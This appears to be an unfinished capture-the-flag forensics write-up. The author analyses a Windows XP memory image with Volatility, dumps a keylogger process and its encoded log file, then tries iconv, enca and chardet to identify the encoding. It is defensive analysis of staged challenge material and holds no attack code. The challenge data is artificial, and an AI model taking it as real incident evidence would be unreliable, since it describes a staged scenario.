------ ---- 0x8107e020:System 4 0 60 228 1970-01-01 00:00:00 UTC+0000 . 0xff596808:smss.exe 544 4 3 17 2016-11-06 16:44:22 UTC+0000 .. 0xff4b4da0:winlogon.exe 644 544 25 524 2016-11-06 16:44:23 UTC+0000 ... 0xff609998:services.exe 744 644 13 246 2016-11-06 16:44:25 UTC+0000 .... 0xff4a3d70:vmacthlp.exe 928 744 1 25 2016-11-06 16:44:26 UTC+0000 .... 0xff67a7e8:spoolsv.exe 1600 744 6 54 2016-11-06 16:47:21 UTC+0000 .... 0xff5cfda0:svchost.exe 992 744 10 178 2016-11-06 16:44:27 UTC+0000 .... 0xff583888:svchost.exe 1348 744 6 119 2016-11-06 16:44:27 UTC+0000 .... 0xff59a7b8:svchost.exe 944 744 7 122 2016-11-06 16:44:26 UTC+0000 .... 0x80fdec10:svchost.exe 180 744 5 88 2016-11-06 16:44:45 UTC+0000 .... 0xff481020:svchost.exe 1876 744 15 194 2016-11-06 16:47:07 UTC+0000 .... 0xff58c7b8:svchost.exe 1244 744 5 59 2016-11-06 16:44:27 UTC+0000 ... 0xff5be460:lsass.exe 760 644 25 332 2016-11-06 16:44:25 UTC+0000 .. 0xff5974d8:csrss.exe 616 544 10 265 2016-11-06 16:44:22 UTC+0000 0x80ecf928:explorer.exe 1740 1704 17 424 2016-11-06 16:44:32 UTC+0000 . 0xff5bf138umpIt.exe 308 1740 1 27 2016-11-06 16:47:42 UTC+0000 . 0x80eb7690:rundll32.exe 1884 1740 4 72 2016-11-06 16:44:37 UTC+0000 . 0xff5b2888:keylog.exe 2020 1740 2 35 2016-11-06 16:47:17 UTC+0000 [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ volatility -f bkav5.raw --profile=WinXPSP2x86 procdump -p 2020 --dump-dir=. Volatility Foundation Volatility Framework 2.5 Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0xff5b2888 0x00400000 keylog.exe OK: executable.2020.exe

• See a supicious keylog.exe so we dumped it.
• Upload it to Virustotal and to Hybrid Analysis.
• Detection ratio: 4 / 56, a keylogger.
• Just look for quick win:

1 2 3 4 5 6 7 8 9

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ strings keylog.exe_executable.2020.exe [...] %c - %d c:/windows/keylog.log [WIN] [...]

• The malware is saving its collected informations in c:/windows/keylog.log.
• Let’s find the file and dump it:

1 2 3 4 5 6 7 8 9 10 11 12

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ volatility -f bkav5.raw --profile=WinXPSP2x86 filescan | grep -i 'keylog.log' Volatility Foundation Volatility Framework 2.5 Offset(P) #Ptr #Hnd Access Name ------------------ ------ ------ ------ ---- 0x00000000010410a0 1 0 RW-rw- \Device\HarddiskVolume1\WINDOWS\keylog.log [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ volatility -f bkav5.raw --profile=WinXPSP2x86 dumpfiles -Q 0x00000000010410a0 --dump-dir=. Volatility Foundation Volatility Framework 2.5 DataSectionObject 0x010410a0 None \Device\HarddiskVolume1\WINDOWS\keylog.log

• But this is a non standard encoding:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ file keylog.log_file.None.0x80eb7008.dat keylog.log_file.None.0x80eb7008.dat: Non-ISO extended-ASCII text, with NEL line terminators [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ xxd keylog.log_file.None.0x80eb7008.dat 00000000: 8589 9790 83bd b3ba 859b b0aa bbac 83b6 ................ 00000010: bbb2 b2b1 859b b0aa bbac 83a9 bbb2 b2b1 ................ 00000020: 859c 9f9d 958d 8e9f 9d9b 83bd b1b3 bbfe ................ 00000030: a7b1 abfe b9ab a7ff 859c 9f9d 958d 8e9f ................ 00000040: 9d9b 83fe e185 9bb0 aabb ac83 a9bb b2fe ................ 00000050: b1ac fea9 bbb2 b2fe e185 9bb0 aabb ac83 ................ 00000060: a9b6 bfaa bbac a8bb acfe 869a 859b b0aa ................ 00000070: bbac 8385 8997 9083 bdb6 acb1 b3bb 859b ................ 00000080: b0aa bbac 83a9 bbb2 feb1 ac85 9c9f 9d95 ................ 00000090: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................ 000000a0: 8385 9c9f 9d95 8d8e 9f9d 9b83 b2bd b1b3 ................ 000000b0: bbfe b1ac fea9 bbb2 bdb1 b3bb 859b b0aa ................ 000000c0: bbac 83ab b6b3 fef0 f0f0 fe85 9c9f 9d95 ................ 000000d0: 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b ................ 000000e0: 8385 9c9f 9d95 8d8e 9f9d 9b83 859c 9f9d ................ 000000f0: 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e 9f9d ................ 00000100: 9b83 859c 9f9d 958d 8e9f 9d9b 8385 9c9f ................ 00000110: 9d95 8d8e 9f9d 9b83 859c 9f9d 958d 8e9f ................ 00000120: 9d9b 8385 9c9f 9d95 8d8e 9f9d 9b83 859c ................ 00000130: 9f9d 958d 8e9f 9d9b 8385 9c9f 9d95 8d8e ................ 00000140: 9f9d 9b83 859c 9f9d 958d 8e9f 9d9b 8385 ................ 00000150: 9c9f 9d95 8d8e 9f9d 9b83 b7fe b9b1 aafe ................ 00000160: b7aa fef0 feaa b6bf aafe a9bb b2bd b1b3 ................ 00000170: bbfe e49a 859d aaac b283 aab8 bf85 9bb0 ................ 00000180: aabb ac83 859d aaac b283 aab8 bdbb b1b1 ................ 00000190: b5f0 bdb1 b385 9bb0 aabb ac83 aab6 b7ad ................ 000001a0: b7ad b3a7 b8b2 bfb9 d7a5 a385 92bb b8aa ................ 000001b0: 9fac acb1 a983 b5ba b7bb b5b5 bab7 eced ................ 000001c0: e7ed e9ba b8b6 ede7 b4ad b2ad bab5 e7ed ................ 000001d0: 859b b0aa bbac 83aa b6bf b0b5 a7b1 abff ................ 000001e0: 859b b0aa bbac 83e4 9abf bcbd babb b8b9 ................ 000001f0: b6b7 b5b2 b3b0 b1ae afac adaa e1e1 e1a7 ................

• This is nor UTF-8, nor WINDOWS-1252/C1252.
• Try to determine what kind of encoding this is (source: superuser.com):

1 2 3 4 5 6

$ iconv --list | sed 's/\/\/$//' | sort > encodings.list $ for a in `cat encodings.list`; do printf "$a " iconv -f $a -t UTF-8 keylog.log_file.None.0x80eb7008.dat > /dev/null 2>&1 \ && echo "ok: $a" || echo "fail: $a" done | tee result.txt

• Let’s take a look at results:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494

1026 ok: 1026 1047 ok: 1047 437 ok: 437 500 ok: 500 500V1 ok: 500V1 850 ok: 850 851 ok: 851 852 ok: 852 855 ok: 855 860 ok: 860 861 ok: 861 862 ok: 862 863 ok: 863 865 ok: 865 866 ok: 866 866NAV ok: 866NAV 8859_1 ok: 8859_1 8859_2 ok: 8859_2 8859_4 ok: 8859_4 8859_5 ok: 8859_5 8859_9 ok: 8859_9 BALTIC ok: BALTIC CP037 ok: CP037 CP10007 ok: CP10007 CP1025 ok: CP1025 CP1026 ok: CP1026 CP1047 ok: CP1047 CP1070 ok: CP1070 CP1079 ok: CP1079 CP1081 ok: CP1081 CP1084 ok: CP1084 CP1097 ok: CP1097 CP1112 ok: CP1112 CP1122 ok: CP1122 CP1123 ok: CP1123 CP1124 ok: CP1124 CP1125 ok: CP1125 CP1129 ok: CP1129 CP1130 ok: CP1130 CP1137 ok: CP1137 CP1140 ok: CP1140 CP1141 ok: CP1141 CP1142 ok: CP1142 CP1143 ok: CP1143 CP1144 ok: CP1144 CP1145 ok: CP1145 CP1146 ok: CP1146 CP1147 ok: CP1147 CP1148 ok: CP1148 CP1149 ok: CP1149 CP1153 ok: CP1153 CP1154 ok: CP1154 CP1155 ok: CP1155 CP1156 ok: CP1156 CP1157 ok: CP1157 CP1158 ok: CP1158 CP1160 ok: CP1160 CP1163 ok: CP1163 CP1164 ok: CP1164 CP1166 ok: CP1166 CP1167 ok: CP1167 CP1251 ok: CP1251 CP1256 ok: CP1256 CP1282 ok: CP1282 CP1390 ok: CP1390 CP1399 ok: CP1399 CP273 ok: CP273 CP278 ok: CP278 CP280 ok: CP280 CP282 ok: CP282 CP284 ok: CP284 CP285 ok: CP285 CP297 ok: CP297 CP437 ok: CP437 CP500 ok: CP500 CP5347 ok: CP5347 CP737 ok: CP737 CP770 ok: CP770 CP771 ok: CP771 CP772 ok: CP772 CP773 ok: CP773 CP774 ok: CP774 CP775 ok: CP775 CP819 ok: CP819 CP850 ok: CP850 CP851 ok: CP851 CP852 ok: CP852 CP855 ok: CP855 CP860 ok: CP860 CP861 ok: CP861 CP862 ok: CP862 CP863 ok: CP863 CP865 ok: CP865 CP866 ok: CP866 CP866NAV ok: CP866NAV CP870 ok: CP870 CP871 ok: CP871 CP880 ok: CP880 CP901 ok: CP901 CP902 ok: CP902 CP9030 ok: CP9030 CP912 ok: CP912 CP915 ok: CP915 CP920 ok: CP920 CP921 ok: CP921 CP922 ok: CP922 CP9448 ok: CP9448 CP-HU ok: CP-HU CPIBM861 ok: CPIBM861 CSIBM037 ok: CSIBM037 CSIBM1025 ok: CSIBM1025 CSIBM1026 ok: CSIBM1026 CSIBM1097 ok: CSIBM1097 CSIBM1112 ok: CSIBM1112 CSIBM1122 ok: CSIBM1122 CSIBM1123 ok: CSIBM1123 CSIBM1124 ok: CSIBM1124 CSIBM1129 ok: CSIBM1129 CSIBM1130 ok: CSIBM1130 CSIBM1137 ok: CSIBM1137 CSIBM1140 ok: CSIBM1140 CSIBM1141 ok: CSIBM1141 CSIBM1142 ok: CSIBM1142 CSIBM1143 ok: CSIBM1143 CSIBM1144 ok: CSIBM1144 CSIBM1145 ok: CSIBM1145 CSIBM1146 ok: CSIBM1146 CSIBM1147 ok: CSIBM1147 CSIBM1148 ok: CSIBM1148 CSIBM1149 ok: CSIBM1149 CSIBM1153 ok: CSIBM1153 CSIBM1154 ok: CSIBM1154 CSIBM1155 ok: CSIBM1155 CSIBM1156 ok: CSIBM1156 CSIBM1157 ok: CSIBM1157 CSIBM1158 ok: CSIBM1158 CSIBM1160 ok: CSIBM1160 CSIBM1163 ok: CSIBM1163 CSIBM1164 ok: CSIBM1164 CSIBM1166 ok: CSIBM1166 CSIBM1167 ok: CSIBM1167 CSIBM1390 ok: CSIBM1390 CSIBM1399 ok: CSIBM1399 CSIBM273 ok: CSIBM273 CSIBM277 ok: CSIBM277 CSIBM278 ok: CSIBM278 CSIBM280 ok: CSIBM280 CSIBM284 ok: CSIBM284 CSIBM285 ok: CSIBM285 CSIBM297 ok: CSIBM297 CSIBM500 ok: CSIBM500 CSIBM5347 ok: CSIBM5347 CSIBM851 ok: CSIBM851 CSIBM855 ok: CSIBM855 CSIBM860 ok: CSIBM860 CSIBM863 ok: CSIBM863 CSIBM865 ok: CSIBM865 CSIBM866 ok: CSIBM866 CSIBM870 ok: CSIBM870 CSIBM871 ok: CSIBM871 CSIBM880 ok: CSIBM880 CSIBM901 ok: CSIBM901 CSIBM902 ok: CSIBM902 CSIBM9030 ok: CSIBM9030 CSIBM921 ok: CSIBM921 CSIBM922 ok: CSIBM922 CSIBM9448 ok: CSIBM9448 CSISO111ECMACYRILLIC ok: CSISO111ECMACYRILLIC CSISO139CSN369103 ok: CSISO139CSN369103 CSISO143IECP271 ok: CSISO143IECP271 CSISOLATIN1 ok: CSISOLATIN1 CSISOLATIN2 ok: CSISOLATIN2 CSISOLATIN4 ok: CSISOLATIN4 CSISOLATIN5 ok: CSISOLATIN5 CSISOLATIN6 ok: CSISOLATIN6 CSISOLATINCYRILLIC ok: CSISOLATINCYRILLIC CSKOI8R ok: CSKOI8R CSMACINTOSH ok: CSMACINTOSH CSN_369103 ok: CSN_369103 CSPC775BALTIC ok: CSPC775BALTIC CSPC850MULTILINGUAL ok: CSPC850MULTILINGUAL CSPC862LATINHEBREW ok: CSPC862LATINHEBREW CSPC8CODEPAGE437 ok: CSPC8CODEPAGE437 CSPCP852 ok: CSPCP852 CSUNICODE ok: CSUNICODE CWI ok: CWI CWI-2 ok: CWI-2 CYRILLIC ok: CYRILLIC EBCDIC-CP-BE ok: EBCDIC-CP-BE EBCDIC-CP-CA ok: EBCDIC-CP-CA EBCDIC-CP-CH ok: EBCDIC-CP-CH EBCDIC-CP-DK ok: EBCDIC-CP-DK EBCDIC-CP-ES ok: EBCDIC-CP-ES EBCDIC-CP-FI ok: EBCDIC-CP-FI EBCDIC-CP-FR ok: EBCDIC-CP-FR EBCDIC-CP-GB ok: EBCDIC-CP-GB EBCDIC-CP-IS ok: EBCDIC-CP-IS EBCDIC-CP-IT ok: EBCDIC-CP-IT EBCDIC-CP-NL ok: EBCDIC-CP-NL EBCDIC-CP-NO ok: EBCDIC-CP-NO EBCDIC-CP-ROECE ok: EBCDIC-CP-ROECE EBCDIC-CP-SE ok: EBCDIC-CP-SE EBCDIC-CP-US ok: EBCDIC-CP-US EBCDIC-CP-WT ok: EBCDIC-CP-WT EBCDIC-CP-YU ok: EBCDIC-CP-YU EBCDIC-CYRILLIC ok: EBCDIC-CYRILLIC EBCDIC-INT1 ok: EBCDIC-INT1 ECMA-128 ok: ECMA-128 ECMACYRILLIC ok: ECMACYRILLIC ECMA-CYRILLIC ok: ECMA-CYRILLIC GEORGIAN-ACADEMY ok: GEORGIAN-ACADEMY GEORGIAN-PS ok: GEORGIAN-PS IBM037 ok: IBM037 IBM1025 ok: IBM1025 IBM-1025 ok: IBM-1025 IBM1026 ok: IBM1026 IBM1047 ok: IBM1047 IBM-1047 ok: IBM-1047 IBM1097 ok: IBM1097 IBM-1097 ok: IBM-1097 IBM1112 ok: IBM1112 IBM-1112 ok: IBM-1112 IBM1122 ok: IBM1122 IBM-1122 ok: IBM-1122 IBM1123 ok: IBM1123 IBM-1123 ok: IBM-1123 IBM1124 ok: IBM1124 IBM-1124 ok: IBM-1124 IBM1129 ok: IBM1129 IBM-1129 ok: IBM-1129 IBM1130 ok: IBM1130 IBM-1130 ok: IBM-1130 IBM1137 ok: IBM1137 IBM-1137 ok: IBM-1137 IBM1140 ok: IBM1140 IBM-1140 ok: IBM-1140 IBM1141 ok: IBM1141 IBM-1141 ok: IBM-1141 IBM1142 ok: IBM1142 IBM-1142 ok: IBM-1142 IBM1143 ok: IBM1143 IBM-1143 ok: IBM-1143 IBM1144 ok: IBM1144 IBM-1144 ok: IBM-1144 IBM1145 ok: IBM1145 IBM-1145 ok: IBM-1145 IBM1146 ok: IBM1146 IBM-1146 ok: IBM-1146 IBM1147 ok: IBM1147 IBM-1147 ok: IBM-1147 IBM1148 ok: IBM1148 IBM-1148 ok: IBM-1148 IBM1149 ok: IBM1149 IBM-1149 ok: IBM-1149 IBM1153 ok: IBM1153 IBM-1153 ok: IBM-1153 IBM1154 ok: IBM1154 IBM-1154 ok: IBM-1154 IBM1155 ok: IBM1155 IBM-1155 ok: IBM-1155 IBM1156 ok: IBM1156 IBM-1156 ok: IBM-1156 IBM1157 ok: IBM1157 IBM-1157 ok: IBM-1157 IBM1158 ok: IBM1158 IBM-1158 ok: IBM-1158 IBM1160 ok: IBM1160 IBM-1160 ok: IBM-1160 IBM1163 ok: IBM1163 IBM-1163 ok: IBM-1163 IBM1164 ok: IBM1164 IBM-1164 ok: IBM-1164 IBM1166 ok: IBM1166 IBM-1166 ok: IBM-1166 IBM1167 ok: IBM1167 IBM-1167 ok: IBM-1167 IBM1390 ok: IBM1390 IBM-1390 ok: IBM-1390 IBM1399 ok: IBM1399 IBM-1399 ok: IBM-1399 IBM256 ok: IBM256 IBM273 ok: IBM273 IBM277 ok: IBM277 IBM278 ok: IBM278 IBM280 ok: IBM280 IBM284 ok: IBM284 IBM285 ok: IBM285 IBM297 ok: IBM297 IBM437 ok: IBM437 IBM500 ok: IBM500 IBM5347 ok: IBM5347 IBM-5347 ok: IBM-5347 IBM775 ok: IBM775 IBM819 ok: IBM819 IBM848 ok: IBM848 IBM850 ok: IBM850 IBM851 ok: IBM851 IBM852 ok: IBM852 IBM855 ok: IBM855 IBM860 ok: IBM860 IBM861 ok: IBM861 IBM862 ok: IBM862 IBM863 ok: IBM863 IBM865 ok: IBM865 IBM866 ok: IBM866 IBM866NAV ok: IBM866NAV IBM870 ok: IBM870 IBM871 ok: IBM871 IBM880 ok: IBM880 IBM901 ok: IBM901 IBM-901 ok: IBM-901 IBM902 ok: IBM902 IBM-902 ok: IBM-902 IBM9030 ok: IBM9030 IBM-9030 ok: IBM-9030 IBM912 ok: IBM912 IBM915 ok: IBM915 IBM920 ok: IBM920 IBM921 ok: IBM921 IBM-921 ok: IBM-921 IBM922 ok: IBM922 IBM-922 ok: IBM-922 IBM9448 ok: IBM9448 IBM-9448 ok: IBM-9448 IEC_P271 ok: IEC_P271 IEC_P27-1 ok: IEC_P27-1 ISO-10646/UCS2/ ok: ISO-10646/UCS2/ ISO_11548-1 ok: ISO_11548-1 ISO11548-1 ok: ISO11548-1 ISO6937 ok: ISO6937 ISO_6937 ok: ISO_6937 ISO_6937:1992 ok: ISO_6937:1992 ISO88591 ok: ISO88591 ISO_8859-1 ok: ISO_8859-1 ISO-8859-1 ok: ISO-8859-1 ISO8859-1 ok: ISO8859-1 ISO885910 ok: ISO885910 ISO_8859-10 ok: ISO_8859-10 ISO-8859-10 ok: ISO-8859-10 ISO8859-10 ok: ISO8859-10 ISO_8859-10:1992 ok: ISO_8859-10:1992 ISO_8859-1:1987 ok: ISO_8859-1:1987 ISO885913 ok: ISO885913 ISO-8859-13 ok: ISO-8859-13 ISO8859-13 ok: ISO8859-13 ISO885914 ok: ISO885914 ISO_8859-14 ok: ISO_8859-14 ISO-8859-14 ok: ISO-8859-14 ISO8859-14 ok: ISO8859-14 ISO_8859-14:1998 ok: ISO_8859-14:1998 ISO885915 ok: ISO885915 ISO_8859-15 ok: ISO_8859-15 ISO-8859-15 ok: ISO-8859-15 ISO8859-15 ok: ISO8859-15 ISO_8859-15:1998 ok: ISO_8859-15:1998 ISO885916 ok: ISO885916 ISO_8859-16 ok: ISO_8859-16 ISO-8859-16 ok: ISO-8859-16 ISO8859-16 ok: ISO8859-16 ISO_8859-16:2001 ok: ISO_8859-16:2001 ISO88592 ok: ISO88592 ISO_8859-2 ok: ISO_8859-2 ISO-8859-2 ok: ISO-8859-2 ISO8859-2 ok: ISO8859-2 ISO_8859-2:1987 ok: ISO_8859-2:1987 ISO88594 ok: ISO88594 ISO_8859-4 ok: ISO_8859-4 ISO-8859-4 ok: ISO-8859-4 ISO8859-4 ok: ISO8859-4 ISO_8859-4:1988 ok: ISO_8859-4:1988 ISO88595 ok: ISO88595 ISO_8859-5 ok: ISO_8859-5 ISO-8859-5 ok: ISO-8859-5 ISO8859-5 ok: ISO8859-5 ISO_8859-5:1988 ok: ISO_8859-5:1988 ISO88599 ok: ISO88599 ISO_8859-9 ok: ISO_8859-9 ISO-8859-9 ok: ISO-8859-9 ISO8859-9 ok: ISO8859-9 ISO_8859-9:1989 ok: ISO_8859-9:1989 ISO88599E ok: ISO88599E ISO_8859-9E ok: ISO_8859-9E ISO-8859-9E ok: ISO-8859-9E ISO8859-9E ok: ISO8859-9E ISO-CELTIC ok: ISO-CELTIC ISO-IR-100 ok: ISO-IR-100 ISO-IR-101 ok: ISO-IR-101 ISO-IR-110 ok: ISO-IR-110 ISO-IR-111 ok: ISO-IR-111 ISO-IR-139 ok: ISO-IR-139 ISO-IR-143 ok: ISO-IR-143 ISO-IR-144 ok: ISO-IR-144 ISO-IR-148 ok: ISO-IR-148 ISO-IR-156 ok: ISO-IR-156 ISO-IR-157 ok: ISO-IR-157 ISO-IR-179 ok: ISO-IR-179 ISO-IR-199 ok: ISO-IR-199 ISO-IR-203 ok: ISO-IR-203 ISO-IR-226 ok: ISO-IR-226 ISO/TR_11548-1/ ok: ISO/TR_11548-1/ KOI8R ok: KOI8R KOI8-R ok: KOI8-R KOI8-RU ok: KOI8-RU KOI8U ok: KOI8U KOI8-U ok: KOI8-U L1 ok: L1 L10 ok: L10 L2 ok: L2 L4 ok: L4 L5 ok: L5 L6 ok: L6 L7 ok: L7 L8 ok: L8 LATIN1 ok: LATIN1 LATIN10 ok: LATIN10 LATIN2 ok: LATIN2 LATIN4 ok: LATIN4 LATIN5 ok: LATIN5 LATIN6 ok: LATIN6 LATIN7 ok: LATIN7 LATIN8 ok: LATIN8 LATIN9 ok: LATIN9 LATIN-9 ok: LATIN-9 MAC ok: MAC MAC-CENTRALEUROPE ok: MAC-CENTRALEUROPE MACCYRILLIC ok: MACCYRILLIC MAC-CYRILLIC ok: MAC-CYRILLIC MACINTOSH ok: MACINTOSH MACIS ok: MACIS MAC-IS ok: MAC-IS MAC-SAMI ok: MAC-SAMI MACUK ok: MACUK MAC-UK ok: MAC-UK MACUKRAINIAN ok: MACUKRAINIAN MIK ok: MIK MS-ARAB ok: MS-ARAB MS-CYRL ok: MS-CYRL MSMACCYRILLIC ok: MSMACCYRILLIC MS-MAC-CYRILLIC ok: MS-MAC-CYRILLIC OSF00010001 ok: OSF00010001 OSF00010002 ok: OSF00010002 OSF00010004 ok: OSF00010004 OSF00010005 ok: OSF00010005 OSF00010009 ok: OSF00010009 OSF0001000A ok: OSF0001000A OSF00010100 ok: OSF00010100 OSF00010101 ok: OSF00010101 OSF00010102 ok: OSF00010102 OSF10020025 ok: OSF10020025 OSF10020111 ok: OSF10020111 OSF10020115 ok: OSF10020115 OSF10020116 ok: OSF10020116 OSF10020118 ok: OSF10020118 OSF1002011C ok: OSF1002011C OSF1002011D ok: OSF1002011D OSF10020129 ok: OSF10020129 OSF100201B5 ok: OSF100201B5 OSF100201F4 ok: OSF100201F4 OSF10020352 ok: OSF10020352 OSF10020354 ok: OSF10020354 OSF10020357 ok: OSF10020357 OSF1002035D ok: OSF1002035D OSF1002035E ok: OSF1002035E OSF1002035F ok: OSF1002035F OSF10020366 ok: OSF10020366 OSF10020367 ok: OSF10020367 OSF10020370 ok: OSF10020370 OSF10020402 ok: OSF10020402 OSF10020417 ok: OSF10020417 PT154 ok: PT154 RK1048 ok: RK1048 RUSCII ok: RUSCII STRK1048-2002 ok: STRK1048-2002 TCVN ok: TCVN TCVN-5712 ok: TCVN-5712 TCVN5712-1 ok: TCVN5712-1 TCVN5712-1:1993 ok: TCVN5712-1:1993 TS-5881 ok: TS-5881 UCS2 ok: UCS2 UCS-2 ok: UCS-2 UCS-2BE ok: UCS-2BE UCS-2LE ok: UCS-2LE UNICODE ok: UNICODE UNICODEBIG ok: UNICODEBIG UNICODELITTLE ok: UNICODELITTLE UTF16 ok: UTF16 UTF-16 ok: UTF-16 UTF16BE ok: UTF16BE UTF-16BE ok: UTF-16BE UTF16LE ok: UTF16LE UTF-16LE ok: UTF-16LE VISCII ok: VISCII WINDOWS-1251 ok: WINDOWS-1251 WINDOWS-1256 ok: WINDOWS-1256

• Tried UTF-16, UNICODELITTLE, UNICODE, LATIN1, ISO-8859-1 WINDOWS-1251, CP1251 with iconv.
• Tried enca recognition:
  
  
  
  

  1 2 3 4 5 6

  [noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ enca -f keylog.log_file.None.0x80eb7008.dat enca: Cannot determine (or understand) your language preferences. Please use `-L language', or `-L none' if your language is not supported (only a few multibyte encodings can be recognized then). Run `enca --list languages' to get a list of supported languages.

• Tried chardet (not even a relevent output):

1 2 3

[noraj@rawsec]––––––––––––––––––––––––––––––[~/CTF/WhiteHat_GrandPrix/2016/For2] $ chardetect keylog.log_file.None.0x80eb7008.dat keylog.log_file.None.0x80eb7008.dat: windows-1253 with confidence 0.3253156807138245

[h=2]Submit[/h]